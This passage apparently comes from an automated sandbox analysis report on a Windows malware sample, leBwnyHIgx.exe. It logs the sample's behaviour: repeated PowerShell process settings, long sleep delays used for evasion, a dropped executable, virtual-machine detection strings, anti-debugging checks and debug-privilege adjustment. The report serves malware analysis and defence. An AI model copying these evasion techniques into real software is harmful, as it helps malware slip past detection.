                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3758Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeWindow / User API: threadDelayed 1767Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeWindow / User API: threadDelayed 3441Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeWindow / User API: threadDelayed 3897Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4151Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1673Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7371Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2030Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3856
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1838
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeDropped PE file which has not been started: C:\Users\user\Downloads\wpsv.5.6.3.exeJump to dropped file
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_5-73746
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-73745
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100Thread sleep count: 6000 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100Thread sleep count: 3758 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1740Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 2128Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 2836Thread sleep count: 282 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484Thread sleep count: 1767 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484Thread sleep time: -1767000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 3636Thread sleep count: 3441 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 3636Thread sleep time: -34410s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484Thread sleep count: 3897 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484Thread sleep time: -3897000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 732Thread sleep count: 4151 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep count: 1673 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep count: 7371 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 2030 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep count: 3856 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep count: 1838 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5468Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5432Thread sleep count: 165 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeThread sleep count: Count: 3441 delay: -10Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040C86C FindFirstFileW,FindClose,0_2_0040C86C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040C2A0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,0_2_00650754
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040C86C FindFirstFileW,FindClose,5_2_0040C86C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,5_2_0040C2A0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,5_2_00650754
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,5_2_030780F0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040E56C GetSystemInfo,0_2_0040E56C
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132915170.0000000000898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltrues
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132915170.0000000000898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu?M
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeAPI call chain: ExitProcess graph end nodegraph_5-72390
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308054D VirtualProtect ?,-00000001,00000104,?5_2_0308054D
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,5_2_03077490
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CD0AE4 mov eax, dword ptr fs:[00000030h]0_2_00CD0AE4
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00D90AE4 mov eax, dword ptr fs:[00000030h]5_2_00D90AE4
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026C0AE4 mov eax, dword ptr fs:[00000030h]5_2_026C0AE4
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF00CD mov eax, dword ptr fs:[00000030h]5_2_02EF00CD
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03076790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,5_2_03076790
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
